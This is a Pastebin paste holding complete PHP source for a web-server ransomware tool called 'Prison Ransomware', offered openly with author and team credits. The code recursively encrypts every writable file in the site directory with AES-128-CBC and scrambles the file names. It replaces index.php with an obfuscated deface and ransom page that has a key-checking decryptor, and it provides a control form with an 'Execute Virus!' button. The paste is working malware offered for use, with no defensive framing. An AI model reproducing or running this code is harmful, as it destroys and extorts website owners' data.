API tools faq
paste
willysec_id

Prison Ransomware

willysec_id
Jun 24th, 2024
54
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 25.29 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. <?php
  2. //* ##############################################################
  3. //*     PRISON RANSOMWARE CODED BY ./Err0r_HB
  4. //*     Author : ./Err0r_HB
  5. //*     Github : https://github.com/Err0r-ICA
  6. //*     Contact : errorhb@protonmail.com
  7. //*     Greetz : All Defacers && Cyb3r Drag0nz / ByteBlitz
  8. //* ##############################################################
  9.  
  10. $filename = basename($_SERVER["PHP_SELF"]);
  11. set_time_limit(0);
  12. ini_set("memory_limit", "-1");
  13. error_reporting(0);
  14.  
  15. // use dot(.) for extensions. you can change it anything you want :)
  16. $encrypt_eks = ".Err0r1337";
  17.  
  18. // skipping encrypt this file! use | for delimiter .
  19. $blacklist = "$filename|index.php|index.html|Cyb3r.php|rans.php|wzo.php|Cyb3r.html|.htaccess|.git|node_modules";
  20.  
  21. class Encrypt
  22. {
  23.     private $encrypt_eks;
  24.     private $blacklist;
  25.     private $write_BlackList;
  26.  
  27.     public function __construct($encrypt_eks, $blacklist)
  28.     {
  29.         $this->encrypt_eks = $encrypt_eks;
  30.         $this->blacklist = explode("|", $blacklist);
  31.         $this->write_BlackList = $blacklist;
  32.  
  33.         if (file_exists($this->locate() . "/index.php")) {
  34.             if (!is_writable($this->locate() . "/index.php")) {
  35.                 echo "<font color = 'red'>Can't run the ransom { index.php is not writeable! remove it manually or change the permissions! }</font>";
  36.                 exit();
  37.             }
  38.         }
  39.     }
  40.  
  41.     private function flush()
  42.     {
  43.         flush();
  44.         ob_flush();
  45.     }
  46.  
  47.     private function kecuali($ext, $name)
  48.     {
  49.         for ($i = 0; $i < count($name); $i++) {
  50.             $re = "/({$name[$i]})/";
  51.             preg_match($re, $ext, $matches);
  52.             if ($matches[1]) {
  53.                 return false;
  54.             }
  55.         }
  56.         return true;
  57.     }
  58.  
  59.     public function locate()
  60.     {
  61.         return getcwd();
  62.     }
  63.  
  64.     public function encrypt_index()
  65.     {
  66.         $get = file_get_contents($this->locate() . "/index.php");
  67.         $convert = base64_encode(
  68.             gzdeflate(
  69.                 str_rot13(
  70.                     rawurlencode(
  71.                         gzdeflate(
  72.                             convert_uuencode(
  73.                                 base64_encode(
  74.                                     str_rot13(
  75.                                         gzdeflate(
  76.                                             convert_uuencode(
  77.                                                 rawurldecode(str_rot13($get))
  78.                                             )
  79.                                         )
  80.                                     )
  81.                                 )
  82.                             )
  83.                         )
  84.                     )
  85.                 )
  86.             )
  87.         );
  88.         $fp = fopen("index.php", "w");
  89.         $open = [
  90.             "<?php",
  91.             '$index=',
  92.             "'",
  93.             $convert,
  94.             "';",
  95.             'eval(str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($index)))))))))))));',
  96.         ];
  97.  
  98.         if (fwrite($fp, implode("\n\r", $open))) {
  99.             echo '<font color="#00BCD4">index.php</font> (<font color="#40CE08">Encrypting The Index Files Success!</font>) <br>';
  100.         }
  101.  
  102.         fclose($fp);
  103.     }
  104.  
  105.     private function renameExt($locate, $dir, $d)
  106.     {
  107.         $encrypt = base64_encode(str_rot13(gzdeflate(str_rot13($d))));
  108.         $new_file = $dir . DIRECTORY_SEPARATOR . $encrypt;
  109.  
  110.         if (is_writable($locate)) {
  111.             if (rename($locate, $new_file . $this->encrypt_eks)) {
  112.                 echo '<font color="#00BCD4">Encrypt Name File...</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">' .
  113.                     $locate .
  114.                     "</font> <br>";
  115.             } else {
  116.                 echo '<font color="#00BCD4">Encrypt Name File...</font> (<font color="red">Failed! Do not know what happened :(</font>) <font color="#FF9800">|</font> ' .
  117.                     $locate .
  118.                     " <br>";
  119.             }
  120.         } else {
  121.             echo '<font color="#00BCD4">Encrypt Name File...</font> (<font color="red">File not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font> ' .
  122.                 $locate .
  123.                 " <br>";
  124.         }
  125.     }
  126.  
  127.     public function cekDirectory($dir, $method, $key)
  128.     {
  129.         foreach (scandir($dir) as $d) {
  130.             if ($d != "." && $d != "..") {
  131.                 $locate = $dir . DIRECTORY_SEPARATOR . $d;
  132.                 if ($this->kecuali($locate, $this->blacklist)) {
  133.                     if (is_writable($locate)) {
  134.                         if (!is_dir($locate)) {
  135.                             $this->spreadRansom($key, $locate, $method);
  136.                             $this->renameExt($locate, $dir, $d);
  137.                         } else {
  138.                             $this->cekDirectory($locate, $method, $key);
  139.                         }
  140.                     } else {
  141.                         if (!is_dir($locate)) {
  142.                             echo '<font color="#00BCD4">File ' .
  143.                                 $locate .
  144.                                 '  </font> (<font color="red">Is not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font><br>';
  145.                         } else {
  146.                             echo '<font color="#00BCD4">Directory ' .
  147.                                 $locate .
  148.                                 '  </font> (<font color="red">Is not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font><br>';
  149.                         }
  150.                         $this->cekDirectory($locate, $method, $key);
  151.                     }
  152.                 }
  153.             }
  154.             $this->flush();
  155.         }
  156.     }
  157.  
  158.     public function DefaceIt($method, $key, $deface)
  159.     {
  160.         $secret_key = password_hash($key, PASSWORD_DEFAULT);
  161.         if (file_exists("index.php")) {
  162.             if (is_writable("index.php")) {
  163.                 rename("index.php", "index.php" . $this->encrypt_eks);
  164.             } else {
  165.                 echo '<font color="#00BCD4">Index.php </font> (<font color="red">File not writeable! Permission Denied! Safe Action... Skipping... </font>)';
  166.             }
  167.         }
  168.  
  169.         $fp = fopen("index.php", "a+");
  170.         $open = [
  171.             //'<?php',
  172.             "// Can You Crack My Strongest Key ? HAHAHA",
  173.             "",
  174.         ];
  175.         $arr = ['$secret_key=', "'", $secret_key, "';"];
  176.         $list = ['$blacklist=', "'", $this->write_BlackList, "';"];
  177.         fwrite($fp, implode("\n\r", $open));
  178.         fwrite($fp, implode("", $arr));
  179.         fwrite($fp, implode("", $list));
  180.         $header =
  181.             "Ly8qICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCi8vKgkJUkFOU09NV0FSRSBDT0RFRCBCWSAuL0VycjByX0hCICAgCQovLwkJQ29udGFjdDogZXJyb3JfaGJAcHJvdG9ubWFpbC5jb20KLy8qCQlHcmVldHogOiBBbGwgRGVmYWNlcnMgJiYgQXp6YXNlYwovLyogIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKCnNldF90aW1lX2xpbWl0KDApOwppbmlfc2V0KCdtZW1vcnlfbGltaXQnLCAnLTEnKTsKZXJyb3JfcmVwb3J0aW5nKDApOwoKY2xhc3MgRGVjcnlwdAp7CiAgICBwcml2YXRlICRibGFja2xpc3Q7CgogICAgIHB1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkYmxhY2tsaXN0KQogICAgewogICAgICAgICR0aGlzLT5ibGFja2xpc3QgPSBleHBsb2RlKCJ8IiwkYmxhY2tsaXN0KTsKICAgIH0KCiAgICBwdWJsaWMgZnVuY3Rpb24ga2VjdWFsaSgkZXh0LCAkbmFtZSkKICAgIHsKICAgICAgICBmb3IoJGkgPSAwIDsgJGkgPCBjb3VudCgkbmFtZSk7ICRpKyspewogICAgICAgICAgICAkcmUgPSAiLyh7JG5hbWVbJGldfSkvIjsKICAgICAgICAgICAgcHJlZ19tYXRjaCgkcmUsICRleHQsICRtYXRjaGVzKTsKICAgICAgICAgICAgaWYgKCRtYXRjaGVzWzFdKSB7CiAgICAgICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgcmV0dXJuIHRydWU7CiAgICB9CgogICAgcHVibGljIGZ1bmN0aW9uIGxvY2F0ZSgpCiAgICB7CiAgICAgICAgcmV0dXJuIGdldGN3ZCgpOwogICAgfQoKICAgIHB1YmxpYyBmdW5jdGlvbiBmbHVzaCgpCiAgICB7CiAgICAgICAgZmx1c2goKTsKICAgICAgICBvYl9mbHVzaCgpOwogICAgfQ==";
  182.         $header2 = [
  183.             'public function cekDirectory($dir, $key)
  184.            {
  185.                foreach (scandir($dir) as $d) {
  186.                    if ($d != "." && $d != "..") {
  187.                        $locate = $dir . DIRECTORY_SEPARATOR . $d;
  188.                        if ($this->kecuali($locate, $this->blacklist)) {
  189.                        if(is_writable($locate)){
  190.                            if (!is_dir($locate)) {
  191.                                $this->DecryptRansom($key, $locate);
  192.                                $this->renameExt($locate, $dir, $d);
  193.                            }
  194.                         else {
  195.                            $this->cekDirectory($locate, $key);
  196.                          }
  197.                        } else{
  198.                            if(!is_dir($locate)){
  199.                                echo `<font color="#00BCD4">File $locate</font> (<font color="red">Is not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font><br>`;
  200.                            } else{
  201.                                echo `<font color="#00BCD4">Directory $locate</font> (<font color="red">Is not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font><br>`;
  202.                            }
  203.                        }  
  204.                        
  205.                      }
  206.                    }
  207.                    $this->flush();
  208.                }
  209.            }',
  210.             'public function removeDeface()
  211.            {
  212.                if(file_exists("index.php")){
  213.                    if(is_writable("index.php")){
  214.                            unlink("index.php");
  215.                            echo `<font color="#00BCD4">index.php removed</font> (<font color="#40CE08">ransom page successfuly decrypted</font>) <br>`;
  216.                    } else{
  217.                        echo `<font color="#00BCD4">index.php removed</font> (<font color="#40CE08">ransom page successfuly decrypted</font>) <br>`;
  218.                    }
  219.                } else{
  220.                
  221.                }
  222.        
  223.                if(file_exists("index.php' .
  224.             $this->encrypt_eks .
  225.             '"))
  226.                        {
  227.                           if(is_writable("index.php' .
  228.             $this->encrypt_eks .
  229.             '")){
  230.                               if(rename("index.php' .
  231.             $this->encrypt_eks .
  232.             '","index.php")){
  233.                                echo `<font color="#00BCD4">index.php' .
  234.             $this->encrypt_eks .
  235.             '</font> (<font color="#40CE08">successfully recovered!</font>) <br>`;
  236.                               }
  237.                          
  238.                           }
  239.                       }
  240.        
  241.            }',
  242.         ];
  243.         switch ($method) {
  244.             case "1":
  245.                 $ransom_decrypt =
  246.                     "JGl2ID0gc3Vic3RyKCRkYXRhLCAwLCBtY3J5cHRfZ2V0X2l2X3NpemUoTUNSWVBUX1JJSk5EQUVMXzEyOCwgTUNSWVBUX01PREVfQ0JDKSk7DQogICAgICAgICRkZWNyeXB0ZWQgPSBydHJpbSgNCiAgICAgICAgICAgIG1jcnlwdF9kZWNyeXB0KA0KICAgICAgICAgICAgICAgIE1DUllQVF9SSUpOREFFTF8xMjgsDQogICAgICAgICAgICAgICAgaGFzaCgnc2hhMjU2JywgJGtleSwgdHJ1ZSksDQogICAgICAgICAgICAgICAgc3Vic3RyKCRkYXRhLCBtY3J5cHRfZ2V0X2l2X3NpemUoTUNSWVBUX1JJSk5EQUVMXzEyOCwgTUNSWVBUX01PREVfQ0JDKSksDQogICAgICAgICAgICAgICAgTUNSWVBUX01PREVfQ0JDLA0KICAgICAgICAgICAgICAgICRpdg0KICAgICAgICAgICAgKSwNCiAgICAgICAgICAgICJcMCINCiAgICAgICAgKTs=";
  247.                 break;
  248.             case "2":
  249.                 $ransom_decrypt =
  250.                     "ICRpdmxlbiA9IG9wZW5zc2xfY2lwaGVyX2l2X2xlbmd0aCgkY2lwaGVyID0gIkFFUy0xMjgtQ0JDIik7DQogICAgICAgICAgICAgICAgJGl2ID0gc3Vic3RyKCRkYXRhLCAwLCAkaXZsZW4pOw0KICAgICAgICAgICAgICAgIHN1YnN0cigkZGF0YSwgJGl2bGVuLCAkc2hhMmxlbiA9IDMyKTsNCiAgICAgICAgICAgICAgICAkY2lwaGVydGV4dF9yYXcgPSBzdWJzdHIoJGRhdGEsICRpdmxlbiArICRzaGEybGVuKTsNCiAgICAgICAgICAgICAgICAkZGVjcnlwdGVkID0gcnRyaW0ob3BlbnNzbF9kZWNyeXB0KCRjaXBoZXJ0ZXh0X3JhdywgJGNpcGhlciwgJGtleSwgT1BFTlNTTF9SQVdfREFUQSwgJGl2KSwgIlwwIik7";
  251.                 break;
  252.         }
  253.         $footer =
  254.             "aWYoaXNfd3JpdGFibGUoJGxvY2F0ZSkpewogICAgaWYgKGZpbGVfcHV0X2NvbnRlbnRzKCRsb2NhdGUsICAkZGVjcnlwdGVkKSkgewogICAgICAgICAgICBlY2hvICc8Zm9udCBjb2xvcj0iIzAwQkNENCI+UmFuc29td2FyZSBEZWNyeXB0Li4uIDwvZm9udD4gKDxmb250IGNvbG9yPSIjNDBDRTA4Ij5TdWNjZXNzPC9mb250PikgPGZvbnQgY29sb3I9IiNGRjk4MDAiPnw8L2ZvbnQ+IDxmb250IGNvbG9yPSIjMjE5NkYzIj4nIC4gJGxvY2F0ZSAuICc8L2ZvbnQ+IDxicj4nOwogICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgIGVjaG8gJzxmb250IGNvbG9yPSIjMDBCQ0Q0Ij5SYW5zb213YXJlIEZhaWxlZCB0byBEZWNyeXB0PC9mb250PiAoPGZvbnQgY29sb3I9InJlZCI+UG9zc2libGUgZGF0YSBjb3JydXB0ITwvZm9udD4pIDxmb250IGNvbG9yPSIjRkY5ODAwIj58PC9mb250PiA8Zm9udCBjb2xvcj0iIzIxOTZGMyI+JyAuICRsb2NhdGUgLiAnPC9mb250PiA8YnI+JzsKICAgICAgICB9Cn0gZWxzZXsKICAgIGVjaG8gJzxmb250IGNvbG9yPSIjMDBCQ0Q0Ij5SYW5zb213YXJlIEZhaWxlZCB0byBEZWNyeXB0PC9mb250PiAoPGZvbnQgY29sb3I9InJlZCI+RmlsZSBub3Qgd3JpdGVhYmxlISBQZXJtaXNzaW9uIERlbmllZCEgT3IgTm90IEVuY3J5cHRlZCBCZWZvcmU/IFNhZmUgQWN0aW9uLi4uIFNraXBwaW5nLi4uIDwvZm9udD4pIDxmb250IGNvbG9yPSIjRkY5ODAwIj58PC9mb250PiA8Zm9udCBjb2xvcj0iIzIxOTZGMyI+JyAuICRsb2NhdGUgLiAnPC9mb250PiA8YnI+JzsKfQoKICAgIH0KfQoKJGluaXQgPSBuZXcgRGVjcnlwdCgkYmxhY2tsaXN0KTsKCmlmIChpc3NldCgkX1BPU1RbJ3N1Ym1pdCddKSkgewogICAgJGtleSA9IHRyaW0oJF9QT1NUWydrZXknXSk7CiAgICBpZiAoJGtleSkgewogICAgICAgIC8vIERvbid0IHJlbW92ZSB0aGUgcGFzc3dvcmRfdmVyaWZ5IGZ1bmN0aW9uICEgCiAgICAgICAgaWYgKHBhc3N3b3JkX3ZlcmlmeSgka2V5LCAkc2VjcmV0X2tleSkpIHsKICAgICAgICAgICAgZWNobyAiPHNjcmlwdD5hbGVydCgnQ29uZ3JhdHMhIENvcnJlY3QgRGVjcnlwdGlvbiBLZXkhJyk8L3NjcmlwdD4iOwogICAgICAgICAgICAkaW5pdC0+Y2VrRGlyZWN0b3J5KCRpbml0LT5sb2NhdGUoKSwgJGtleSk7CiAgICAgICAgICAgICRpbml0LT5yZW1vdmVEZWZhY2UoKTsKICAgICAgICB9IGVsc2V7CiAgICAgICAgICAgIGVjaG8gIjxzY3JpcHQ+YWxlcnQoJ1dob29wei4gV3JvbmcgUGFzc3dvcmQuIFRha2UgYSBkZWVwIGJyZWF0aGUgYW5kIHRyeSBhZ2FpbiEnKTwvc2NyaXB0PiI7CiAgICAgICAgfQogICAgfSBlbHNlewogICAgICAgIGVjaG8gIjxzY3JpcHQ+YWxlcnQoJ0tleSBjYW5ub3QgYmUgZW1wdHkhJyk8L3NjcmlwdD4iOwogICAgfQp9Cgo/Pg==";
  255.         $decryptor = [
  256.             ' public function renameExt($locate, $dir, $d)
  257.            {
  258.                $locates = str_replace("' .
  259.             $this->encrypt_eks .
  260.             '", "", $d);
  261.                $locates = str_rot13(gzinflate(str_rot13(base64_decode($locates))));
  262.                $new_file = $dir . DIRECTORY_SEPARATOR . $locates;
  263.                if(is_writable($locate)){
  264.                    if(rename($locate,$new_file))
  265.                    {
  266.                        echo `<font color="#00BCD4">Decrypt Name File</font> (<font color="#49D2SNGzC9GHcrUUaqinbv3Z2PLFKvxxmFNNsY6aQG72DmWbGET77srS3bd7S1wwYLTnyPqURASpx15UMac6uZKxFzSmgvJ>`;
  267.                    }else{
  268.                        echo `<font color="#00BCD4">Decrypt Name File</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font>$locate<br>`;
  269.                    }
  270.                } else{
  271.                    echo `<font color="#00BCD4">Decrypt Name File...</font> (<font color="red">File not writeable! Permission Denied! Or Not Encrypted Before? Safe Action... Skipping... </font>) <font color="#FF9800">|</font>$locate<br>`;
  272.                }
  273.                
  274.            }',
  275.             'public function DecryptRansom($key, $locate)
  276.                {',
  277.             ' $data = base64_decode(file_get_contents($locate));',
  278.             base64_decode($ransom_decrypt),
  279.             base64_decode($footer),
  280.         ];
  281.  
  282.         if (fwrite($fp, base64_decode($header))) {
  283.             echo '<font color="#00BCD4">index.php</font> (<font color="#40CE08">Implement The Header Decryptor Success!</font>) <br>';
  284.         }
  285.         if (fwrite($fp, implode("\n\r", $header2))) {
  286.             echo '<font color="#00BCD4">index.php</font> (<font color="#40CE08">Implement The Header Decryptor 2 Success!</font>) <br>';
  287.         }
  288.  
  289.         if (fwrite($fp, implode("\n\r", $decryptor))) {
  290.             echo '<font color="#00BCD4">index.php</font> (<font color="#40CE08">Implement The Core Decryptor Success!</font>) <br>';
  291.         }
  292.  
  293.         if (fwrite($fp, $deface)) {
  294.             echo '<font color="#00BCD4">index.php</font> (<font color="#40CE08">Implement The Deface Page Success!</font>) <br>';
  295.         }
  296.         fclose($fp);
  297.     }
  298.  
  299.     private function spreadRansom($key, $locate, $method)
  300.     {
  301.         $data = chmod($locate, 0777);
  302.         $data = file_get_contents($locate);
  303.         switch ($method) {
  304.             case "1":
  305.                 $iv = mcrypt_create_iv(
  306.                     mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),
  307.                     MCRYPT_DEV_URANDOM
  308.                 );
  309.                 $encrypted = base64_encode(
  310.                     $iv .
  311.                         mcrypt_encrypt(
  312.                             MCRYPT_RIJNDAEL_128,
  313.                             hash("sha256", $key, true),
  314.                             $data,
  315.                             MCRYPT_MODE_CBC,
  316.                             $iv
  317.                         )
  318.                 );
  319.                 break;
  320.             case "2":
  321.                 $ivlen = openssl_cipher_iv_length($cipher = "AES-128-CBC");
  322.                 $iv = openssl_random_pseudo_bytes($ivlen);
  323.                 $ciphertext_raw = openssl_encrypt(
  324.                     $data,
  325.                     $cipher,
  326.                     $key,
  327.                     OPENSSL_RAW_DATA,
  328.                     $iv
  329.                 );
  330.                 $hmac = hash_hmac("sha256", $ciphertext_raw, $key, true);
  331.                 $encrypted = base64_encode($iv . $hmac . $ciphertext_raw);
  332.                 break;
  333.         }
  334.         if (is_writable($locate)) {
  335.             if (file_put_contents($locate, $encrypted)) {
  336.                 echo '<font color="#00BCD4">AES-128-CBC Ransom...</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">' .
  337.                     $locate .
  338.                     "</font> <br>";
  339.             } else {
  340.                 echo '<font color="#00BCD4">AES-128-CBC Ransom...</font> (<font color="red">Failed! Do not know what happen :(</font>) <font color="#FF9800">|</font> ' .
  341.                     $locate .
  342.                     " <br>";
  343.             }
  344.         } else {
  345.             echo '<font color="#00BCD4">AES-128-CBCRansom...</font> (<font color="red">File not writeable! Permission Denied! Safe Action... Skipping... </font>) <font color="#FF9800">|</font> ' .
  346.                 $locate .
  347.                 " <br>";
  348.         }
  349.     }
  350. }
  351. $init = new Encrypt($encrypt_eks, $blacklist);
  352.  
  353. if (isset($_POST["submit"])) {
  354.     $deface = trim($_POST["deface"]);
  355.     $key = trim($_POST["key"]);
  356.     $method = trim($_POST["method"]);
  357.     if ($key) {
  358.         if ($deface) {
  359.             switch ($method) {
  360.                 case "1":
  361.                     if (version_compare(PHP_VERSION, "7.2.0", ">")) {
  362.                         echo "<br><br><font color = red>Ransomware Mcrypt Only Support in PHP 5 . Use Ransomware OpenSSL instead of Ransomware Mcrypt </font> ";
  363.                     }
  364.                     break;
  365.             }
  366.             $init->cekDirectory($init->locate(), $method, $key);
  367.             $init->DefaceIt($method, $key, $deface);
  368.             $init->encrypt_index();
  369.         }
  370.     }
  371. }
  372. ?>
  373.  
  374. <html>
  375.  
  376. <head>
  377.     <link rel="icon" type="image/gif" href="https://i.postimg.cc/fWPTKQ6s/Picsart-24-03-16-05-04-18-637.png">
  378.     <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
  379.     <title> &#1203;&#824;&#1202;&#824;&#1203; ./Err0r_HB Prison Ransomware &#1203;&#824;&#1202;&#824;&#1203;</title>
  380.     <style type="text/css">
  381.         body {
  382.             background: black;
  383.  
  384.             color: #e2e2e2;
  385.         }
  386.  
  387.         .selecte {
  388.             border-color: lime;
  389.             width: 300px;
  390.             height: 30px;
  391.             background-color: transparent;
  392.             color: lime;
  393.         }
  394.  
  395.         .inpute {
  396.             width: 500px;
  397.             height: 20px;
  398.             border-color: #EA2A14;
  399.             background-color: transparent;
  400.             color: lime;
  401.             text-align: center;
  402.         }
  403.  
  404.         .submite {
  405.             width: 200px;
  406.             border-color: red;
  407.             background-color: transparent;
  408.             color: red;
  409.         }
  410.  
  411.         textarea {
  412.             border-color: #EA2A14;
  413.             width: 100%;
  414.             height: 400px;
  415.             padding-left: 5px;
  416.             margin: 10px auto;
  417.             resize: none;
  418.             background: transparent;
  419.             color: #ffffff;
  420.             font-size: 13px;
  421.         }
  422.     </style>
  423. </head>
  424.  
  425. <body>
  426.     <center>
  427.         <pre>
  428. <font color = "lime">
  429. ____________
  430. ║▒▒▒▒▒▒▒▒▒▒║
  431. ║▒▒▒▒▒▒▒▒▒▒║
  432.  ║▒▒▒▒▒▒▒▒▒▒║  
  433. <font color = "#008000">╔════════════╗
  434. ╚════════════╝
  435.  <font color = "#ff1493">║<font color = "#FFFFFF">██████████<font color = "#ff1493">╚╗
  436. <font color = "#ff1493"> ║<font color = "#FFFFFF">██<font color = "#ff1493">╔══╗<font color = "#FFFFFF">█<font color = "#ff1493">╔═╗<font color = "#FFFFFF">█<font color = "#ff1493">║
  437.  <font color = "#ff1493">║<font color = "#FFFFFF">██<font color = "#ff1493">║<font color = "#20b2aa">╬<font color = "#ff1493">╔╝<font color = "#FFFFFF">█<font color = "#ff1493">╚╗║<font color = "#FFFFFF">█<font color = "#ff1493">║
  438.     <font color = "#ff1493">    ║<font color = "#FFFFFF">██<font color = "#ff1493">╚═╝<font color = "#FFFFFF">█<font color = "#ff1493">║<font color = "#FFFFFF">█<font color = "#ff1493">╚╝<font color = "#FFFFFF">█<font color = "#ff1493">║<font color = "lime"> PRISON
  439.           <font color = "#ff1493">  ╚╗<font color = "#FFFFFF">█████████<font color = "#ff1493">═╝<font color = "lime"> RANSOMWARE
  440.             <font color = "#ff1493">       ╚╗║╠╩╩╩╩╩╝<font color = "lime">   *ZzZZzZzzZzZzzZ*
  441.            <font color = "#ff1493">║║╚╗┈<font color = "#ffa07a">█<font color = "#FFFFFF">▐█████<font color = "">▒<font color = "#C0C0C0">.。oO
  442. <font color = "#ff1493">║<font color = "#FFFFFF">██<font color = "#ff1493">╠╦╦╦╗
  443.                  <font color = "#ff1493">   ╚╗<font color = "#FFFFFF">██████<font color = "lime"> Author : *Err0r_HB*
  444.                                    <font color = "#ff1493"> ╚════╝  <font color = "lime">Team : Cyb3r Drag0nz / ByteBlitz  
  445.                
  446. <font color = "#20b2aa"><══════════════════════════════════>
  447.      
  448. <font color = "lime"> -[ Contact : errorhb@protonmail.com ]- <font color = "Cyan"><br>
  449.  
  450.  System :  <br><?php echo php_uname() . "\n"; ?>
  451.  <br>
  452.  <font color = "#FFD700">#Ransomware is placed in [Dir]: <font color = "lime">
  453.  <?php echo getcwd(); ?>/<?php echo basename($_SERVER["PHP_SELF"]) . "\n"; ?>
  454.  <br>
  455.  <font color = "#FFD700">#Ransomware Executing in [Dir]: <font color = "lime">
  456.  <?php echo getcwd(); ?>
  457.  <br>
  458. <font color = "#FFD700"> Note: <br> Recommended Use Ransom OpenSSL for Support All PHP Version<br>
  459.         Ransom Mcrypt Only Support PHP 5 , DEPRECATED in PHP 7.1.0 and REMOVED in PHP 7.2.0 <br>
  460. *Important : File Will not Be Encrypted (Check Blacklist Variable) :<br>    <?php echo $blacklist; ?>
  461.  </font>   
  462. </pre>
  463.  
  464.         <h2>
  465.             <font color='red' face='iceland'> Put Your Uncrackable Key Here Skidz
  466.         </h2>
  467.         </font>
  468.  
  469.         <form action="" method="post" style=" text-align: center;">
  470.             <?= $data =
  471.                 isset($_POST["key"]) && !$_POST["key"]
  472.                     ? "Key cannot be empty"
  473.                     : "" ?>
  474.             <br><br>
  475.             <input type="text" name="key" class="inpute" placeholder="ENCRYPTION KEY" autocomplete="off" value="<?= $v = isset(
  476.                 $_POST["key"]
  477.             )
  478.                 ? $_POST["key"]
  479.                 : "" ?>"><br><br>
  480.             <h2>
  481.                 <font color="red" face="iceland">Deface Page</font>
  482.             </h2>
  483.             <?= $data =
  484.                 isset($_POST["deface"]) && !$_POST["deface"]
  485.                     ? "Deface Page cannot be empty"
  486.                     : "" ?>
  487.             <br><br>
  488.             <textarea style='width: 450px; height: 150px;' name="deface"><?= $dipes = isset(
  489.                 $_POST["deface"]
  490.             )
  491.                 ? $_POST["deface"]
  492.                 : "" ?></textarea>
  493.             </font>
  494.             <h2>
  495.                 <font color='lime' face='iceland'>
  496.  
  497.                     <font size="4">
  498.  
  499.                     </font>PHP_VERSION : <?= phpversion() ?><br><br>
  500.                     Post Method:
  501.                 </font><br>
  502.  
  503.             </h2>
  504.             <select name="method" class="selecte">
  505.                 <option value="1">Ransom Mcrypt</option>
  506.                 <option value="2">Ransom OpenSSL</option>
  507.             </select><br><br><br><br>
  508.             <input type="submit" name="submit" class="submite" value="Execute Virus!" />
  509.         </form>
  510.     </center>
  511. </body><center>
  512. <img src="https://i.postimg.cc/fWPTKQ6s/Picsart-24-03-16-05-04-18-637.png" alt="Logo" width="500" height="500"></center>
  513. </html>
  514. <br>
  515. <!-- do not remove this! after post method, if you refresh the page so it will
  516.    not loop the encrypt function that cause data corrupt! ---->
  517. <script>
  518.     if (window.history.replaceState) {
  519.         window.history.replaceState(null, null, window.location.href);
  520.     }
  521. </script>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!